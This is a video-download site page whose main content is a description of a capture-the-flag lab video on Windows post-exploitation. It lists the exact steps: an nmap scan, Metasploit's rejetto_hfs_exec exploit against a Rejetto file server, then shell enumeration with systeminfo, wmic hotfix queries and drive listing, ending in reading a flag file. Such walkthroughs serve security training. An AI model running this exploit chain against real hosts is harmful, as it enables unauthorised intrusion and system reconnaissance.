У нас вы можете посмотреть бесплатно Project 137 - Post Exploitation: Manually Enumerating System Details of A Windows Hosts (CTF) или скачать в максимальном доступном качестве, видео которое было загружено на ютуб. Для загрузки выберите вариант из формы ниже:
Если кнопки скачивания не
загрузились
НАЖМИТЕ ЗДЕСЬ или обновите страницу
Если возникают проблемы со скачиванием видео, пожалуйста напишите в поддержку по адресу внизу
страницы.
Спасибо за использование сервиса ClipSaver.ru
Commands Used/Steps Taken (in the order that they appear in the video): 1. nmap -sV 10.2.24.80 2. Opened a web browser and navigated to 10.2.24.80 3. service postgresql start && msfconsole 4. workspace -a rejetto 5. setg RHOSTS 10.2.24.80 6. search rejetto (the vulnerable http file server type is rejetto) 7. use exploit/windows/http/rejetto_hfs_exec 8. show options 9. exploit 10. shell 11. hostname (to view the target hostname) 12. systeminfo (to display all the Operating System information: build number, hotfixes, etc) 13. wmic qfe get Caption,Description,HotFixID,InstalledOn (to get detail links, nature, ID, and installation dates of hotfixes) 14. Ctrl + C (to terminate shell channel) 15. show_mount (to show fixed and removable drives attached to system) 16. cd C:\\ (to enter C drive’s root directory) 17. dir 18. cat flag.txt